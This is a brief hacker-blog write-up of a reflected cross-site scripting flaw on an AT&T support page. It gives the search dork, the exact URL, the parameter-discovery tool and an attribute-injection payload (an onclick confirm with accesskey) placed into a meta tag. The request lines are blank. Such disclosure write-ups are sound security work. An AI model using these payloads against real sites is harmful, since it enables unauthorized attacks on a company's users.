Reflected XSS on AT&T

Learn System Security - Reflected XSS on AT&T ~

I searching with this google dork
site:att.com ext:jsp
And I found this URL
https://www.att.com/esupport/serviceInterstitial.jsp
 I start using Arjun to find some unique parameter on that page
And I found like one interesting parameter because the value of that parameter isn't inside of double quote (") but inside of "
Request:
Response:
  • <meta name=&quot;WT.mc_id&quot; content=&quot;test&quot;>
Next, I try to create a new HTML attribute by adding a space,
Request:
Response:
  • <meta name=&quot;WT.mc_id&quot; content=&quot;test id=x&quot;>

Next step,
Request:
Response:
  • <meta name=&quot;WT.mc_id&quot; content=&quot;x onclick=confirm(document.domain) accesskey=x &quot;>
🔥🔥🔥

#HappyHacking

0 comments